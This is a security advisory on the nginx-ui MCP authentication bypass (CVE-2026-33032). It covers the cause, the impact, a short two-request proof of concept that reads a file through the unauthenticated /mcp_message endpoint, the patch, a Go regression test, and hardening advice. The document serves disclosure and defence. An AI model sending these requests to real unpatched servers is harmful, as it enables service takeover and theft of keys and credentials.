1. Description of the vulnerability
Nginx UI is a widely used open source graphical management tool for Nginx. Its integrated MCP (Model Context Protocol) interface contains a serious authentication bypass vulnerability caused by an oversight in the code implementation. The vulnerability is codenamed MCPwn and tracked as CVE-2026-33032.
The core cause of this vulnerability is a logical error in route registration: the /mcp endpoint is protected by the AuthRequired() middleware, but its paired /mcp_message endpoint, which receives the actual tool call instructions, is deployed without this authentication middleware. This allows any attacker with network access to the UI to take over the Nginx service without any credentials.
2. Impact of vulnerabilities
•CVE Number: CVE-2026-33032
•Nickname: MCPwn
•CVSS 3.1 Rating: 9.8 (Critical) (Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
•Vulnerability Type: Authentication Bypass (CWE-306)
•Affected versions: nginx-ui < 2.3.4
•Fixed version: nginx-ui ≥ 2.3.4
•Technical implications:
•Arbitrary configuration changes: The edit_config tool can rewrite the server block to insert an upstream server controlled by the attacker.
•Service takeover: reload_nginx makes a malicious configuration take effect immediately, and stop_nginx causes a denial of service (DoS).
•Leakage of sensitive information: The read_file tool can read sensitive files such as TLS private keys and system credentials.
•Persistence: Attackers can use create_cert to reissue certificates they control, or combine this flaw with other vulnerabilities to maintain long-term access.
3. POC (Proof of Concept)
The attack chain is extremely simple, requiring only two HTTP requests to complete the takeover:
Step 1: Get the Session ID
An attacker initiates a request to an unrestricted SSE stream endpoint to obtain the session identifier needed to execute subsequent commands.
GET /mcp HTTP/1.1
Host: :9000
Expected response: the server returns a data stream containing sessionID=XYZ.
Step 2: Execute the elevated privilege tool command
Using the acquired sessionID, send JSON-RPC calls to /mcp_message, e.g. to read sensitive files:
POST /mcp_message?sessionID=XYZ HTTP/1.1
Host: :9000
Content-Type: application/json
{ "jsonrpc": "2.0", "method": "read_file", "params": { "path":"/etc/nginx/nginx.conf" }, "id": 1 }
Vulnerability Exploitation Chain
This vulnerability is often used in combination with CVE-2026-27944 (an unauthorized backup download vulnerability). The latter can compromise node_secret. Even after CVE-2026-33032 is fixed, an attacker could still maintain access to the MCP interface if the key is not rotated in a timely manner.
4. Remediation recommendations
4.1 Core Fix
•Upgrade now: Upgrade nginx-ui to 2.3.4 or higher. The official patch adds the AuthRequired() call to the route registration.
// Fixed code snippet
r.POST("/mcp_message", AuthRequired(), mcpMessageHandler)
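A regression check for this kind of route-registration gap, as an added example that is not nginx-ui's own code. It uses Go's standard net/http instead of the project's router, and authRequired, ok, newRouter and unauthenticatedRoutes are hypothetical stand-ins.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// authRequired stands in for AuthRequired() (assumed check: any Authorization header present).
func authRequired(next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("Authorization") == "" {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next(w, r)
	}
}

func ok(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) }

// newRouter registers both endpoints; patched=false leaves /mcp_message unwrapped (the flaw above).
func newRouter(patched bool) http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/mcp", authRequired(ok))
	message := http.HandlerFunc(ok)
	if patched {
		message = authRequired(ok)
	}
	mux.HandleFunc("/mcp_message", message)
	return mux
}

// unauthenticatedRoutes probes each path in-process without credentials; returns paths not answering 401/403.
func unauthenticatedRoutes(h http.Handler, paths []string) []string {
	var open []string
	for _, p := range paths {
		rec := httptest.NewRecorder()
		h.ServeHTTP(rec, httptest.NewRequest(http.MethodPost, p, nil))
		if rec.Code != http.StatusUnauthorized && rec.Code != http.StatusForbidden {
			open = append(open, p)
		}
	}
	return open
}

func main() {
	paths := []string{"/mcp", "/mcp_message"}
	fmt.Println(unauthenticatedRoutes(newRouter(false), paths), unauthenticatedRoutes(newRouter(true), paths))
}
```

Run as a unit test over every registered route, a check like this fails the build when a new endpoint is added without the middleware.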
4.2 Mitigation and Hardening
•Port isolation: Never expose the nginx-ui management port (default 9000) directly to the public network; use a VPN, bastion, or firewall (whitelisting policy) for access control.
•Disable the feature: If AI-assisted management is not required, the MCP module can be completely disabled in the configuration file.
•Key rotation: When upgrading, be sure to rotate node_secret, the SSL key, and all sensitive credentials stored in the panel.
4.3 Detection methods
•Automated testing: Non-destructive checks are available through the Python script or the Nmap NSE plugin supplied by keraattin/CVE-2026-33032.
5. Reference citations
Original article by Chief Security Officer. If reproduced, please credit https://www.cncso.com/en/nginx-ui-mcp-authentication-bypass.html